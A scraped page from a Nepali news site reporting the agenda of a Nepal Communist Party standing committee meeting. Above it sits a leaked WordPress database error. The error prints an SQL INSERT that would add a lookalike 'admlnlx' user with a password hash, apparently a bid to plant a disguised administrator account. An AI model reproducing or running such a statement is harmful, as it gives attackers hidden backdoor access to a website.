WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BtUg6zaCoe1.NcXFhLfSpDjdWsxgoT1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 11:05:26', '', 'admlnlx', 'admlnlx')

नेपाल कम्युनिस्ट पार्टी (नेकपा) स्थायी कमिटी बैठकमा पाँच एजेण्डा – Gaule Khabar

नेपाल कम्युनिस्ट पार्टी (नेकपा) स्थायी कमिटी बैठकमा पाँच एजेण्डा

नेपाल कम्युनिस्ट पार्टी (नेकपा) स्थायी कमिटी बैठकमा पाँच एजेण्डा

गाउँले न्युज, नेपाल कम्युनिस्ट पार्टी (नेकपा)को आइतबार बिहान प्रधानमन्त्री निवास बालुवाटारमा बसेको सचिवालय बैठकले स्थायी कमिटीका एजेण्डाहरू तय गरेको छ ।

नेकपा प्रवक्ता नारायणकाजी श्रेष्ठका अनुसार दिउँसो १ बजे पार्टी कार्यालय धुम्बाराहीमा बस्ने स्थायी कमिटी बैठकमा अध्यक्ष पुष्पकमल दाहाल प्रचण्डले राजनीतिक प्रतिवेदन पेस गर्नेछन् ।
यसबाहेक विधान संशोधन, नेपाल भारत सीमा समस्या, केन्द्रीय कमिटी बैठकलगायत एजेण्डा पनि रहेको छ । उक्त बैठकमा प्रधानन्त्री एवं नेकपा अध्यक्ष केपी शर्मा ओली भने केहीबेर मात्र सहभागी भएका थिए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका